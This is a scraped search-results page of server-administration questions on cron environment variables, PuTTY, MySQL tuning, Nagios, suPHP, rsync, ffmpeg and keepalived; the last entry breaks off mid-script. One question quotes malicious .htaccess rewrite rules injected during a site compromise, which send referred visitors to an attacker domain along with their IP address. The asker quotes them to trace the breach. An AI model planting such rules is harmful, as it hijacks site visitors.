Search Results

Search found 22929 results on 918 pages for 'ssis script'.


  • How to use a common library of environment variables among different languages?

    - by JDS
    We have three main languages with which we perform system tasks: Bash, Ruby, and PHP, and Perl. Four, four main languages. We use managed environment variables to provide authorization info that automated scripts need, for example a MySQL user account and password. We'd like to use a single managed file to maintain these variables. In some instances, for example in cron, these environment variables are not available. They are made available in CLI scripts because we source the env file in everyone's profile, but something like cron doesn't do that. On the CLI, when the env file is sourced, any given script can access those variables: Bash has them directly, PHP in $_ENV, Ruby in ENV, etc. We can't source the file into non-Bash scripts, because most languages implement shell commands by running them in a subshell. We considered parsing the Bash, converting it to the script's language, and running the equivalent of "exec(parsed_output)" on the resulting strings. What is a good solution for providing managed environment variables to scripts running in cron, or similar?
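
    One pattern that fits these constraints is to keep the shared file in plain KEY=value form (no shell logic), so Bash can source it and the other languages can parse it line by line, and to give cron jobs a tiny wrapper that sources the file before exec'ing the real job. A minimal sketch; the path /etc/managed_env and the wrapper name are assumptions, not something from the question:

        #!/bin/bash
        # /usr/local/bin/with_env -- wrapper so cron jobs see the managed variables.
        # /etc/managed_env holds plain KEY=value lines, e.g.  MYSQL_USER=appuser
        set -a                 # export everything sourced below
        . /etc/managed_env     # the same file everyone's profile sources
        set +a
        exec "$@"              # run the real job with the variables in its environment

    A crontab entry would then look like "* * * * * /usr/local/bin/with_env /usr/bin/php /path/to/job.php", while PHP, Ruby, and Perl scripts run outside the shell can still parse the same file directly, since it contains no shell syntax.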

    Read the article

  • Send command through PuTTY automatic login

    - by Arthur
    I am using the following to log in automatically to a remote server and then run the commands listed in commands.txt:

        C:\path to\putty.exe -ssh adreese.ip -l user -pw Password -m C:\Path to\command.txt

    commands.txt contains the following:

        wakeonlan -i <broadcast address> <MAC address>

    However, when I try this, a new PuTTY window appears, but it closes and exits immediately after login, so I cannot see the output of the command(s). After several tests, it appears that the command is not executed, because my computer doesn't wake on LAN. I don't understand what's going on here. I cannot use the plink.exe program because I cannot connect with a public key (there are too many remote sites to register keys in PuTTY for each one). Can someone help me with this? Or can I use another program to make an SSH connection and send commands from a script on a Windows OS? Edit: I also tried putting a bash file with the same command on the remote server and executing it from the session like this:

        C:\path to\putty.exe -ssh adreese.ip -l user -pw Password \home\user\script.sh

    I have the same problem. Need help please.
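
    For comparison, if an OpenSSH client is available on the Windows side (Git Bash, Cygwin, or WSL), the same command can be run while keeping the output both on screen and in a log file. This is only a sketch; the host, user, addresses, and the use of sshpass (which must be installed separately) are assumptions:

        # password auth via sshpass; broadcast address and MAC are placeholders
        sshpass -p 'Password' ssh -o ConnectTimeout=10 user@remote.host \
            'wakeonlan -i 192.168.1.255 AA:BB:CC:DD:EE:FF; echo "exit code: $?"' \
            | tee wol_output.log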

    Read the article

  • How to extract attachments from Exchange 2003 database

    - by John
    I have an ancient Exchange 2003 server that I'm getting ready to retire. All user accounts have been migrated to Google Apps for Business, so no new mail is being sent or received on the server. There are fewer than 50 accounts on the server, but some are very large, so the whole Exchange database is between 10 and 20 GB. The largest account has over 100,000 messages. I believe that in the migration to Gmail, some attachments were not migrated. For peace of mind, I'd like to get the attachments out of the Exchange database. The only way I know of to do this is to set up a second computer with Outlook on it, set up one of the accounts, and then sync the whole mail history and get the attachments out that way. Is there something simpler that I can do? Here are two possibilities:
        An Exchange attachment retrieval tool/script that pulls attachments for all accounts directly out of the Exchange database.
        An Exchange PST exporter tool/script that will export PST files for all accounts, so that I can just load the PST files into Outlook at will.

    Read the article

  • Nginx: Loopback connection via PHP's getimagesize() crashes server (Magento's CMS)

    - by Alex
    We were able to trace a problem that is crashing our NGINX server running Magento down to the following point. Background info: the Magento backend has a CMS function with a WYSIWYG editor. This editor loads some pictures via a controller in Magento (cms/directive). When we set the NGINX error_log level to info, we get the following line (line breaks inserted for better readability):

        2012/10/22 18:05:40 [info] 14105#0: *1 client closed prematurely connection, so upstream connection is closed too while sending request to upstream,
        client: XXXXXXXXX, server: test.local,
        request: "GET index.php/admin/cms_wysiwyg/directive/___directive/BASEENCODEDIMAGEURL,,/ HTTP/1.1",
        upstream: "fastcgi://127.0.0.1:9024", host: "test.local"

    When checking the code in the debugger, the following call never returns (in Varien_Image_Adapter_Abstract::getMimeType()):

        # $this->_fileName is http://test.local/skin/adminhtml/base/default/images/demo-image-not-existing.gif
        # $_SERVER['REQUEST_URI'] = http://test.local/admin/cms_wysiwyg/directive/___directive/BASEENCODEDIMAGEURL
        list($this->_imageSrcWidth, $this->_imageSrcHeight, $this->_fileType, ) = getimagesize($this->_fileName);

    The file name requested is a URL pointing back to the same server that is running the script: a link to a static .gif that does not exist. Sample URL: http://test.local/skin/adminhtml/base/default/images/demo-image-not-existing.gif. Once the above line executes, the NGINX server stops responding to any subsequent request. After waiting around 10 minutes, the NGINX server starts answering requests again. I tried to reproduce the error with a simple test script that only calls getimagesize() with the given URL, but that does not crash; it simply leads to an exception saying that the URL could not be loaded (which is fine, as the URL is wrong).
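
    One way to confirm that this is a loopback deadlock (the PHP worker blocking on an HTTP request that only the same, now-busy FastCGI pool could answer) is to watch the site and the backend while the editor request is in flight. A rough sketch, reusing the hostname and backend port from the question:

        # fire the admin request that triggers getimagesize() in the background
        curl -s -o /dev/null 'http://test.local/index.php/admin/cms_wysiwyg/directive/___directive/BASEENCODEDIMAGEURL,,/' &

        # does the static (missing) gif still answer within 5 seconds?
        curl --max-time 5 -s -o /dev/null -w 'static gif: %{http_code}\n' \
            'http://test.local/skin/adminhtml/base/default/images/demo-image-not-existing.gif'

        # how many connections are tied up on the FastCGI backend?
        ss -tn state established '( dport = :9024 or sport = :9024 )'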

    Read the article

  • Why is my server performance degrading to the point of stopping, periodically?

    - by Pascal Aschwanden
    So, once in a while, I see in Firebug that a request takes over 15 or even 60 seconds to respond, and sometimes it never does. Here is what I've ruled out: It's not the CPU, because every time I check the server load it's less than 6 for all 3 numbers. It's not the memory, because that's fairly low too, less than 50%. It's not the I/O anymore, because I've seen the graphs that Joyent sent back to me when I requested them, and they show less than 3 MB of I/O (mostly all reads). It's not the SQL performance - I've profiled every last SQL command that runs, and they're all (99.9% of them anyway) running in less than 30 ms; most run in less than 5 ms. Oh, and I've been profiling all the script execution times, and even when the problem occurs, the script always manages to finish in 50 ms or less (that's 1/20th of a second). Now, I do run a lot of AJAX calls: one every 2 seconds per user, and I have 300+ DAU. But even if all 300 are playing simultaneously, that's still only 150 calls per second max. The only other thing I can think of is that one of my neighbors is funky. The problem is highly intermittent. 99% of the time it works perfectly and there's excellent performance, but 99%+ is not good enough. Eventually the performance gets so bad I have to restart the server, at which point everything is fine again. I've done this about 4 times now. Any ideas? Note: this is on Joyent, VPS, intro package, 256 MB of RAM with bursting. Here is the MySQL status info:

        Traffic                       | Total   | ø per hour
        Received                      | 18 MiB  | 29 MiB
        Sent                          | 134 MiB | 221 MiB
        Total                         | 151 MiB | 251 MiB

        Connections                   | Total   | ø per hour | %
        max. concurrent connections   | 5       | ---        | ---
        Failed attempts               | 0       | 0.00       | 0.00%
        Aborted                       | 0       | 0.00       | 0.00%
        Total                         | 9,418   | 15.59 k    | 100.00%
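
    To catch the stall window as it happens, a small probe that records system load and local response time side by side can help correlate the slowdowns with something external (a noisy neighbour, bursting limits). A rough sketch; the URL and log path are placeholders:

        #!/bin/bash
        # probe.sh -- run in the background; writes one line every 5 seconds
        while true; do
            t=$(curl -s -o /dev/null --max-time 60 -w '%{time_total}' http://localhost/)
            printf '%s load=%s resp=%ss\n' "$(date '+%F %T')" \
                   "$(cut -d' ' -f1-3 /proc/loadavg)" "$t"
            sleep 5
        done >> /var/log/perf_probe.log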

    Read the article

  • Chrome will not load a web page with an <embed> element

    - by rossmcm
    I have been trying to get a simple sound web page going. Sound.html:

        <script>
          function PlaySound () {
            var sounder = document.getElementById ("ToneA") ;
            sounder.Play () ;
          }
        </script>
        <embed id="ToneA" height="1" width="1"
               src="https://dl.dropboxusercontent.com/u/311035/ToneA.mp3"
               autostart="false" enablejavascript="true" />
        <button onclick="PlaySound () ;">Play</button>

    The test web page is here. It plays in IE, but not in Firefox or Chrome. My problem: Chrome reports "Could not load VLC Plugin". This seems to be a known problem that the VLC community don't necessarily feel like fixing at the moment, and is a result of Google choosing not to allow a certain kind of plugin. If I disable the plugin, I no longer get the message, but nothing happens when I click the button. Looking at the console in a debug window I see:

        Uncaught TypeError: undefined is not a function   Sound.html:7
            PlaySound                                     Sound.html:7
            onclick

    which suggests Chrome could not find anything else to handle the sound file. How do I tell Chrome to use (e.g.) Windows Media Player? UPDATE: This is apparently because the VLC plugin is an NPAPI plugin and Chrome no longer supports these. I have uninstalled VLC, and this has removed the error on loading the web page with an embedded sound element, but it still doesn't invoke WMP instead.

    Read the article

  • How to use LVM on Rackspace Cloud

    - by batrick
    Dear all, I am trying to set up a simple but effective solution to back up my Rackspace cloud servers. These servers each run Subversion, Trac, and some database-backed custom PHP applications. My idea is to set up LVM and mount a volume under, say, /srv. In this volume, I keep the data from all applications. Instead of caring about how to back up each app in a different way (svn hotcopy, trac-admin hotcopy, huge mess for MySQL), I simply take an LVM snapshot and back this one up to Cloud Files using the excellent cloudcity script (http://github.com/jspringman/cloudcity/blob/master/cloudcity). The advantage of this solution is that it is quick and easy, and LVM allows decent backups to be made. As more apps are added, the backup script should not need to change much. The downside, and the main point of my question here, is that I am not sure how to get LVM working on the Rackspace cloud, because there is only one root volume and no service like Amazon's EBS. I was thinking it may be possible to create a large empty file and use this as a "physical volume". Has anybody done anything like this before? Or do you know why it can never work? It would be great to hear from you. Thanks, batrick
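
    For what it's worth, the "large empty file as a physical volume" idea can be sketched with a loop device. This is only an illustration (sizes, paths, and names are made up), not a claim about how well it will behave on Rackspace's storage:

        # create a sparse 20 GB backing file and expose it as a block device
        dd if=/dev/zero of=/srv-backing.img bs=1M count=0 seek=20480
        losetup /dev/loop0 /srv-backing.img

        # build LVM on top of the loop device
        pvcreate /dev/loop0
        vgcreate vg_data /dev/loop0
        lvcreate -n lv_srv -L 15G vg_data       # leave free space in the VG for snapshots
        mkfs.ext3 /dev/vg_data/lv_srv
        mount /dev/vg_data/lv_srv /srv

        # later, at backup time: snapshot, upload, then remove the snapshot
        lvcreate -s -n lv_srv_snap -L 4G /dev/vg_data/lv_srv

    Note that the loop device would have to be re-attached after every reboot, e.g. from an init script.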

    Read the article

  • Tuning up a MySQL server

    - by NinjaCat
    I inherited a MySQL server, so I've started by running the MySQLTuner.pl script. I am not a MySQL expert, but I can see that there is definitely a mess here. I'm not looking to go after every single thing that needs fixing and tuning, but I do want to grab the major, low-hanging fruit. Total memory on the system is 512 MB. Yes, I know it's low, but it's what we have for the time being. Here's what the script had to say:

        General recommendations:
            Run OPTIMIZE TABLE to defragment tables for better performance
            MySQL started within last 24 hours - recommendations may be inaccurate
            Enable the slow query log to troubleshoot bad queries
            When making adjustments, make tmp_table_size/max_heap_table_size equal
            Reduce your SELECT DISTINCT queries without LIMIT clauses
            Increase table_cache gradually to avoid file descriptor limits
            Your applications are not closing MySQL connections properly
        Variables to adjust:
            query_cache_limit (> 1M, or use smaller result sets)
            tmp_table_size (> 16M)
            max_heap_table_size (> 16M)
            table_cache (> 64)
            innodb_buffer_pool_size (>= 326M)

    For the variables that it recommends I adjust, I don't even see most of them in the mysql.cnf file:

        [client]
        port = 3306
        socket = /var/run/mysqld/mysqld.sock

        [mysqld_safe]
        socket = /var/run/mysqld/mysqld.sock
        nice = 0

        [mysqld]
        innodb_buffer_pool_size = 220M
        innodb_flush_log_at_trx_commit = 2
        innodb_file_per_table = 1
        innodb_thread_concurrency = 32
        skip-locking
        big-tables
        max_connections = 50
        innodb_lock_wait_timeout = 600
        slave_transaction_retries = 10
        innodb_table_locks = 0
        innodb_additional_mem_pool_size = 20M
        user = mysql
        socket = /var/run/mysqld/mysqld.sock
        port = 3306
        basedir = /usr
        datadir = /var/lib/mysql
        tmpdir = /tmp
        skip-external-locking
        bind-address = localhost
        key_buffer = 16M
        max_allowed_packet = 16M
        thread_stack = 192K
        thread_cache_size = 4
        myisam-recover = BACKUP
        query_cache_limit = 1M
        query_cache_size = 16M
        log_error = /var/log/mysql/error.log
        expire_logs_days = 10
        max_binlog_size = 100M
        skip-locking
        innodb_file_per_table = 1
        big-tables

        [mysqldump]
        quick
        quote-names
        max_allowed_packet = 16M

        [mysql]

        [isamchk]
        key_buffer = 16M

        !includedir /etc/mysql/conf.d/
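
    As a side note, variables that are absent from the config file are simply running at their compiled-in defaults, which is why the tuner flags them. A quick way to see what the running server is actually using (the root password will be prompted for):

        mysql -u root -p -e "
            SHOW VARIABLES LIKE 'query_cache_limit';
            SHOW VARIABLES LIKE 'tmp_table_size';
            SHOW VARIABLES LIKE 'max_heap_table_size';
            SHOW VARIABLES LIKE 'table_cache';
            SHOW VARIABLES LIKE 'innodb_buffer_pool_size';"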

    Read the article

  • Finding Webserver Vulnerability

    - by Brent
    We operate a webserver farm hosting around 300 websites. Yesterday morning a script placed .htaccess files owned by www-data (the Apache user) in every directory under the document_root of most (but not all) sites. The content of the .htaccess file was this:

        RewriteEngine On
        RewriteCond %{HTTP_REFERER} ^http://
        RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
        RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}

    Googling for that URL (which is the MD5 hash of "antivirus") I discovered that this same thing happened all over the internet, and I am looking for somebody who has already dealt with this and determined where the vulnerability is. I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing and have gotten further than I have in pinpointing the hole? So far we have determined:
        the changes were made as www-data, so Apache or its modules are likely the culprit
        all the changes were made within 15 minutes of each other, so it was probably automated
        since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site)
        if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse)
    Any more hints would be appreciated.
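
    One way to narrow things down is to work backwards from the mtimes of the dropped files and then pull everything the access logs saw in that 15-minute window. A sketch only; the docroot and log paths below are assumptions about this particular farm's layout:

        # 1. list the .htaccess files www-data wrote, with timestamps, to pin down the window
        find /var/www -name .htaccess -user www-data \
            -printf '%TY-%Tm-%Td %TH:%TM %p\n' | sort | head -20

        # 2. pull every request logged during that window across all vhosts
        #    (the timestamp fragment is a placeholder for the window found above)
        grep -h '22/Oct/2012:06:1' /var/log/apache2/*access*.log \
            | awk '{print $1, $6, $7}' | sort | uniq -c | sort -rn | head -40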

    Read the article

  • Limited user requires admin rights for plug and play printer?

    - by Kalamane
    I have a small fleet of laptops, not part of a domain, running Windows XP Pro SP3 as limited users. They are used for printing different shipping documents. I have a script that runs at startup and uses devcon and prntmngr to detect and install/configure the currently connected USB printers. This lets us deploy the laptops to any printing station with a USB printer and have the printer "just work" for the end-user employee. I've taken the original clone image and have added functionality to it. Since then I've discovered a bit of an issue with HP LaserJet P1606dn printers: they have started asking for admin rights during setup. This happens with and without the script running. Previously they would install automatically, because I had installed WHQL plug-and-play drivers for them. I thought it might have to do with the HP Smart Install utility, but it happens even when that is disabled. I don't have a good point to roll back to before this started happening, because this was an issue on the image I took initially to start this upgrade. What could be causing this?

    Read the article

  • suPHP not working

    - by amarc
    OS: Ubuntu 10.04. /etc/suphp/suphp.conf:

        [global]
        ;Path to logfile
        logfile=/var/log/suphp/suphp.log
        ;Loglevel
        loglevel=info
        ;User Apache is running as
        webserver_user=www-data
        ;Path all scripts have to be in
        docroot=/home
        ;Path to chroot() to before executing script
        ;chroot=/mychroot
        ; Security options
        allow_file_group_writeable=false
        allow_file_others_writeable=false
        allow_directory_group_writeable=false
        allow_directory_others_writeable=false
        ;Check wheter script is within DOCUMENT_ROOT
        check_vhost_docroot=true
        ;Send minor error messages to browser
        errors_to_browser=false
        ;PATH environment variable
        env_path=/bin:/usr/bin
        ;Umask to set, specify in octal notation
        umask=0077
        ; Minimum UID
        min_uid=100
        ; Minimum GID
        min_gid=100

        [handlers]
        ;Handler for php-scripts
        application/x-httpd-suphp="php:/usr/bin/php-cgi"
        ;Handler for CGI-scripts
        x-suphp-cgi="execute:!self"

    A vhost in sites-enabled:

        NameVirtualHost *:8080
        <VirtualHost *:8080>
            ServerAdmin ...
            ServerName ...
            ServerAlias ...
            AddType application/x-httpd-php .php
            AddHandler application/x-httpd-php .php
            suPHP_Engine on
            suPHP_UserGroup user user
            suPHP_ConfigPath "/home/user/etc"
            suPHP_PHPPath /usr/bin
            DocumentRoot /home/user/web/site.com/
            ErrorLog /var/log/apache2/site.com-error_log
            CustomLog /var/log/apache2/site.com-access_log common
            <Directory /home/user/web/site.com/>
                Order Deny,Allow
                Allow from all
                Options +Indexes
            </Directory>
        </VirtualHost>

    But when I created /home/user/web/id.php with nano, pasted <?php system('id'); ?> into it, and requested it, the result I get is: uid=33(www-data) gid=33(www-data) groups=33(www-data). I have no idea what to do, so I was hoping the community could help. Thanks.

    Read the article

  • Log connections to program

    - by Zac
    Besides using iptables to log incoming connections, is there a way to log established inbound connections to a service that you don't have the source to (suppose the service doesn't log stuff like this on its own)? What I want to do is gather some information about who's connecting, to be able to tell things like what times of day the service is used the most, where in the world the main user base is, etc. I am aware I can use netstat and just hook it up to a cron script, but that might not be accurate, since the script could only run as frequently as once a minute. Here is what I am thinking right now:
        Write a program that constantly polls netstat, looking for established connections that didn't appear in the previous poll. This idea seems like such a waste of CPU time, though, since there may not be a new connection.
        Write a wrapper program that accepts inbound connections on whatever port the service runs on, but then I wouldn't know how to pass that connection along to the real service.
    Edit: It just occurred to me that this question might be better for Stack Overflow, though I am not certain. Sorry if this is the wrong place.
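
    For reference, the first idea (polling for connections that were not present in the previous sample) is cheap enough in practice if the poll is a one-liner. A rough sketch using ss; the port and log path are placeholders, and the very first sample will log every connection that already exists:

        #!/bin/bash
        PORT=8080
        prev=""
        while true; do
            curr=$(ss -tn state established "( sport = :$PORT )" | awk 'NR>1 {print $4}' | sort -u)
            # log peers that were not in the previous sample
            comm -13 <(echo "$prev") <(echo "$curr") | while read -r peer; do
                echo "$(date '+%F %T') new connection from $peer" >> /var/log/conn_monitor.log
            done
            prev="$curr"
            sleep 1
        done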

    Read the article

  • Using sed to Download ComboFix automatically

    - by user901398
    I'm trying to write a shell script to grab the dynamic URL that ComboFix is located at on BleepingComputer.com/download/combofix. However, for some reason I can't seem to get my regex to match the download link behind the "click here if the download doesn't work" link. I used a regex tester and it said I matched the link, but when I execute the script it turns up an empty result. Here's my entire script:

        #!/bin/bash
        # Download latest ComboFix from BleepingComputer
        wget -O Listing.html "http://www.bleepingcomputer.com/download/combofix/" -nv
        downloadpage=$(sed -ne 's@^.*<a href="\(http://www[.]bleepingcomputer[.]com/download/combofix/dl/[0-9]\+/\)" class="goodurl">.*$@\1@p' Listing.html)
        echo "DL Page: $downloadpage"
        secondpage="$downloadpage"
        wget -O Download.html $secondpage -nv
        file=$(sed -ne 's@^.*<a href="\(http://download[.]bleepingcomputer[.]com/dl/[0-9A-Fa-f]\+/[0-9A-Fa-f]\+/windows/security/anti[-]virus/c/combofix/ComboFix[.]exe\)">.*$@\1@p' Download.html)
        echo "File: $file"
        wget -O "ComboFix.exe" "$file" -nv
        rm Listing.html
        rm Download.html
        mkdir Tools
        mv "ComboFix.exe" "Tools/ComboFix.exe" -f

    The first two downloads work successfully, and I end up with http://www.bleepingcomputer.com/download/combofix/dl/12/, but the final sed, which should give me the actual download link, fails to match. The code it's supposed to match is:

        <a href="http://download.bleepingcomputer.com/dl/6c497ccbaff8226ec84c97dcdfc3ce9a/5058d931/windows/security/anti-virus/c/combofix/ComboFix.exe">click here</a>
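
    As an aside, a simpler extraction with grep -o can be easier to debug than a long, anchored sed expression; a rough sketch against the same Download.html (the pattern is an assumption about the page's markup):

        file=$(grep -oE 'http://download\.bleepingcomputer\.com/dl/[0-9A-Fa-f]+/[0-9A-Fa-f]+/windows/security/anti-virus/c/combofix/ComboFix\.exe' Download.html | head -n 1)
        echo "File: $file"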

    Read the article

  • Nagios send mail when server is down

    - by tzulberti
    I am using Nagios 3.06 to monitor the servers. When a service is critical, it sends a mail, but when a server is down no mail is sent. Even if all the services go to a critical state, no mail is sent. I have the following configuration:

        define command {
            command_name notify-host-by-email
            command_line python /etc/nagios3/send_mail.py "[Nagios] $HOSTNAME$" "******** Nagios ****\n\n Host: $HOSTNAME$\n Description: the server is down"
        }

        define command {
            command_name notify-service-by-email
            command_line python /etc/nagios3/send_mail.py "[Nagios] $HOSTNAME$: $SERVICEDESC$ ($NOTIFICATIONTYPE$)" "***** Nagios *****\n\nNotification Type: $NOTIFICATIONTYPE$\nService: $SERVICEDESC$\nHost: $HOSTALIAS$\nAddress: $HOSTADDRESS$\nState: $SERVICESTATE$\nDate/Time: $LONGDATETIME$\nAdditional Info:$SERVICEOUTPUT$"
        }

    The Python script just sends a mail. It works if I execute it from the command line, but no email is sent from Nagios. What am I doing wrong? UPDATE: The contact data is:

        define contact {
            contact_name                    root
            alias                           Root
            service_notification_period     24x7
            host_notification_period        24x7
            service_notification_options    w,u,c,r
            host_notification_options       d,r
            service_notification_commands   notify-service-by-email
            host_notification_commands      notify-host-by-email
            email                           [email protected]
        }

        define contactgroup {
            contactgroup_name   admins
            alias               Nagios Administrators
            members             root
        }
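
    One thing worth checking is whether the host-notification command works at all when run by hand as the Nagios user, with the macros replaced by literal values. A sketch; the nagios user name, the host name, and the config path are assumptions:

        # run the exact notify-host-by-email command line manually
        sudo -u nagios python /etc/nagios3/send_mail.py \
            "[Nagios] someserver" "******** Nagios ****\n\n Host: someserver\n Description: the server is down"

        # and confirm the host definitions actually allow host notifications
        grep -rn 'notifications_enabled\|notification_options' /etc/nagios3/conf.d/ | head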

    Read the article

  • Wordpress on Apache is redirecting all https to http

    - by Krist van Besien
    I have a problem with a WordPress site on a server I admin. I don't know anything about WordPress, however. My problem is that we want the site to be accessed over https, but somehow all requests to https:// URLs are answered by the server with a 302, redirecting to http. The WordPress site itself is configured to use https, and we see that in the pages that are generated the links are all https links. In the Apache config there are no rewrite rules and no redirects. However, any request to an https:// URL is answered with a redirect to the equivalent http URL, and I really would like to know where these redirects are coming from and what is generating them. I've increased the log level on the webserver to DEBUG, but did not get any info there. I tried to enable debug logging in WordPress per the recipe I found here: http://codex.wordpress.org/Debugging_in_WordPress, but did not get a debug.log file in the directory where one should appear. I'm really at a loss here, and need to fix this urgently. Any hints as to where to start looking? Apache is 2.2.14 on Ubuntu. There are several other virtual hosts on this server using PHP and https without any problem. Edit: I created a small info.php script and dropped it in the webserver's root. Calling it yields the output of the script; no redirect is generated. This suggests that it's not the webserver, but WordPress that is doing it. A second thing I noticed is that the redirect comes with several cookies, one of which has "httponly" set. Could that be it?
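
    A quick way to see who is answering the https request is to look at the raw response: status line, Location target, and cookies (a redirect issued by WordPress usually carries its cookies, while a plain Apache redirect usually does not). A sketch; the hostname is a placeholder:

        # what comes back for an https page served by WordPress?
        curl -skI https://www.example.org/some-page/ | grep -iE '^(HTTP/|Location:|Set-Cookie:)'

        # compare with the info.php test script mentioned above, which reportedly works
        curl -skI https://www.example.org/info.php | head -n 1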

    Read the article

  • debian lenny email server

    - by Dal
    Hi, I am a newbie. I set up a Debian Lenny box at home with the web and email server from the default installation. I followed the instructions for Exim, ran dpkg-reconfigure exim4-config, and set it up for mydomainhere.com. I created a one-line message file and attempted to test Exim by running the command exim [email protected] < msgfile. I also tried using exim4 and Exim, but I get the same error: -bash: Exim: command not found. Obviously I don't know how to run and test Exim. I also tried to run a PHP file that sends a test mail and had no success. That script is tested and works fine if I run it at my hosting ISP on a different domain, so I know the PHP script is good. The Debian system sits behind a Netgear firewall and uses a 192.168.1.x IP. The web server works great and users can visit my site, but I lack the knowledge to get email working. I'd appreciate it if someone could guide me.
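
    For reference, on Debian the binary is exim4, and a first smoke test usually looks something like the sketch below (the recipient address is a placeholder):

        echo "test body" | exim4 -v someone@example.com   # -v prints the delivery attempt
        exim4 -bt someone@example.com                     # show how Exim would route this address
        exim4 -bp                                         # anything stuck in the queue?
        tail -n 50 /var/log/exim4/mainlog                 # delivery log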

    Read the article

  • How do I rsync an entire folder based on the existence of a specific file type in that folder

    - by inquam
    I have a server set up that receives movies into a folder, and I then serve these movies using DLNA. But all kinds of files end up in that initial folder: pictures, music, documents, etc. I thought I'd fix this by running the following script inside that folder:

        rsync -rvt --include='*/' --include='*.avi' --include='*.mkv' --exclude='*' . ../Movies/

    This works: it scans the given folder and moves all the found movies of the given extension types to the Movies folder. But I wonder if there is any way to tell rsync that, if a folder is found containing a movie of the given extension types, it should sync the entire folder, including other files such as .srt. This is to make it easier for me to get subtitles moved along with the movie. I have a solution figured out via a script written in PHP (yes, I actually do most of my scripting on Linux in PHP... just a habit that stuck a long time ago), but if rsync can handle it from the start that would be super. Also, I have noticed that this rsync invocation actually copies all the top-level folders in the given folder: if no movie is in a folder, it will still create an empty folder. How do I prevent rsync from doing this, and save myself the trouble of deleting all the empty folders in Movies?
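
    One way to express "sync the whole folder if it contains at least one movie" is to let find pick the directories and hand each one to rsync; adding -m / --prune-empty-dirs to the original command separately addresses the empty-folder issue. A sketch only, assuming GNU find and the same source/destination layout as above:

        # copy every directory that contains at least one .avi/.mkv, with everything in it (.srt, .nfo, ...)
        find . -type f \( -iname '*.avi' -o -iname '*.mkv' \) -printf '%h\n' | sort -u |
        while read -r dir; do
            rsync -rvt "$dir" ../Movies/
        done

        # alternatively, keep the original filter but stop rsync creating empty destination folders
        rsync -rvtm --include='*/' --include='*.avi' --include='*.mkv' --exclude='*' . ../Movies/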

    Read the article

  • Using screen to monitor non-interactive scripts (or some other solution)

    - by Michael
    I have some autonomous scripts that run commands on remote machines over ssh. These scripts rely on getting stdout, stderr, and the return code of each command run. I want to be able to monitor the progress of the scripts on each target machine so that I can see if something has hung and possibly intervene if necessary. My initial idea was to have the scripts run commands in a screen session, so that the person monitoring could simply attach to the session with screen -x. However, it was hard to do that from a script since screen is an interactive program. I can send a command to the screen session with screen -S session -X stuff "command^M", but then I don't get the output and return code that I need back. My second idea was to put script /path/to/log in ~/.bash_profile and log the entire session to a file. Then the monitoring person could simply tail the log file. However, this doesn't provide the interactivity that I was looking for. Any ideas on how to solve this problem?
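
    One pattern that keeps both properties (the script still captures stdout/stderr and the exit code, while a human can watch live) is to tee each remote command's output into a per-host log that the monitoring person tails. A minimal sketch; the host name and log directory are placeholders:

        LOGDIR=/var/log/remote-jobs
        mkdir -p "$LOGDIR"

        # a human can follow along with:  tail -f /var/log/remote-jobs/host1.log
        output=$(ssh host1 'some_command --with-args' 2>&1 | tee -a "$LOGDIR/host1.log"
                 exit "${PIPESTATUS[0]}")    # make the substitution return ssh's code, not tee's
        status=$?
        printf 'host1 exited with %s\n' "$status" | tee -a "$LOGDIR/host1.log"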

    Read the article

  • reaching constant video bitrate by using ffmpeg

    - by sebastian
    We use ffmpeg and a transcoding script, and want to make some batch files we can reuse for transcoding. For example, I use a parameter called video_kbit: if I pass in 30000 it should reach 30 Mbit/s. Of course, if I use 6000 as the parameter it should reach 6 Mbit/s as well, so I have one script that reaches every video bitrate I want. As my settings are now, I only reach 18.1 Mbit/s. Only when I use 15000 as the parameter do I reach my goal of a constant video bitrate of 15 Mbit/s. If I use 8000 as the parameter I get 10.1 Mbit/s as a result. So under 15000 I get a higher bitrate, and over 15000 a lower bitrate, than I want. My current settings are:

        ffmpeg -threads "4" -i "$2" -f mp4 -c:v libx264 -crf 1 \
            -bufsize 30000k -maxrate ${FC_PARAM_video_kbit}k \
            -acodec libfaac -ac 2 -ab ${FC_PARAM_audio_kbit}k -ar 44100 \
            -pix_fmt yuv420p -vf scale=${FC_PARAM_width}:${FC_PARAM_height} -y "$3"

    And I am using these parameters:

        FC_PARAM_video_kbit = 30000
        FC_PARAM_audio_kbit = 192
        FC_PARAM_width = 1920
        FC_PARAM_height = 1080

    I have tried using a higher bufsize and using profile:v and level settings, but nothing got me near a constant video bitrate of 30 Mbit/s. Do you have any ideas or suggestions for a better way to reach my goal?
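
    For reference, a constant-bitrate-style encode is normally requested from libx264 by dropping -crf (a quality target, with -maxrate only acting as a cap) and giving an explicit -b:v, with -minrate and -maxrate pinned to the same value and a bufsize sized to taste. A sketch using the same variables as the script above; treat it as a starting point, not a drop-in replacement:

        ffmpeg -threads 4 -i "$2" -f mp4 -c:v libx264 \
            -b:v ${FC_PARAM_video_kbit}k \
            -minrate ${FC_PARAM_video_kbit}k -maxrate ${FC_PARAM_video_kbit}k \
            -bufsize $((FC_PARAM_video_kbit * 2))k \
            -acodec libfaac -ac 2 -ab ${FC_PARAM_audio_kbit}k -ar 44100 \
            -pix_fmt yuv420p -vf "scale=${FC_PARAM_width}:${FC_PARAM_height}" -y "$3"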

    Read the article

  • query keepalived

    - by tdimmig
    Note: I have trouble deciding what should go on Server Fault and what should go on Super User; if some kindly admin decides this is in the wrong place, please move it for me - many thanks. I am implementing a basic HA system with keepalived. I only want to be notified of a failover in the case of hardware failure. I do, however, have the servers switch roles periodically: I have a track_script running on the backup that varies its return value between 0 and 1 on an interval (once a week, once a month, whatever). Upon returning 0, the priority is raised above that of the master; upon returning 1, the priority is lowered again. This way they trade places on the configured interval. The question: what can I do to tell the difference between a switch caused by my script and a switch caused because one of the servers died? I certainly want to be notified when there is an actual problem, but not every time the servers change places because of the script. I see that version 1.2.7 has SNMP support and I may be able to use it to get some information that could tell me one way or another, but to be honest I've never used SNMP before and I don't know how to get the information I want with it (my Google-fu failed me).
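
    One way to tell the two cases apart without SNMP is to have the rotation track_script drop a marker just before it flips the priority, and have the notify script stay quiet when that marker is present. keepalived passes notify scripts three arguments (GROUP or INSTANCE, the instance name, and the new state). A rough sketch; the flag path, mail command, and addresses are placeholders:

        #!/bin/bash
        # keepalived-notify.sh TYPE NAME STATE  (referenced by "notify" in keepalived.conf)
        TYPE=$1 NAME=$2 STATE=$3
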